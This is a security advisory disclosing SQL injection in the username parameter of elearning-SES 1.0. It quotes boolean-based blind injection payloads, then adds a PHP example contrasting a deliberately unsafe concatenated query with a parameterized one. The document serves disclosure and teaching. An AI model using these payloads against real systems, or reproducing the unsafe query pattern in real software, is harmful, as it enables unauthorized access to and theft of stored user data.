elearning-SES 1.0 SQL Injection
elearning-SES version 1.0 suffers from a remote SQL injection vulnerability.
## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.14.2023
## Vendor: https://github.com/oretnom23
## Software: https://github.com/oretnom23/php-elearning-system
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or
3996=3998-- were each submitted in the username parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all information from the database of this system.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)

## Proof and Exploit:
[href]()

## Time spent:
01:15:00
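
The description above infers the flaw from two username values producing different responses. The following added example (not code from php-elearning-system or from the advisory's author) reproduces that difference against a concatenated query and shows it disappear once the value is bound as a parameter. The `users` table, its columns and both function names are hypothetical, and an in-memory SQLite database stands in for the application's MySQL backend.

```php
<?php
// Added illustration, not code from php-elearning-system. The table, columns
// and function names are hypothetical; in-memory SQLite stands in for MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)');

// One constructed sample account so the table is not empty.
$ins = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
$ins->execute(['alice', password_hash('constructed-sample', PASSWORD_DEFAULT)]);

// Unsafe pattern: the POSTed username is concatenated into the SQL text,
// so a quote inside the value rewrites the WHERE clause itself.
function lookup_unsafe(PDO $db, string $username): int
{
    $sql = "SELECT id FROM users WHERE username = '" . $username . "'";
    return count($db->query($sql)->fetchAll());
}

// Hardened pattern: the value is bound as a parameter, so the database
// treats it purely as data and never parses it as SQL.
function lookup_safe(PDO $db, string $username): int
{
    $stmt = $db->prepare('SELECT id FROM users WHERE username = ?');
    $stmt->execute([$username]);
    return count($stmt->fetchAll());
}

// The two probe values quoted in the description above.
$probes = ["73152795' or 7515=7515-- ", "13684562' or 3996=3998-- "];

foreach ($probes as $probe) {
    printf(
        "%-28s unsafe rows=%d  safe rows=%d\n",
        $probe,
        lookup_unsafe($db, $probe),
        lookup_safe($db, $probe)
    );
}
```

With the concatenated query the first probe matches a row and the second matches none, which is the response difference the description reports; with the bound parameter both probes match nothing. The same `prepare`/`execute` pattern applies unchanged when PDO is connected to MySQL.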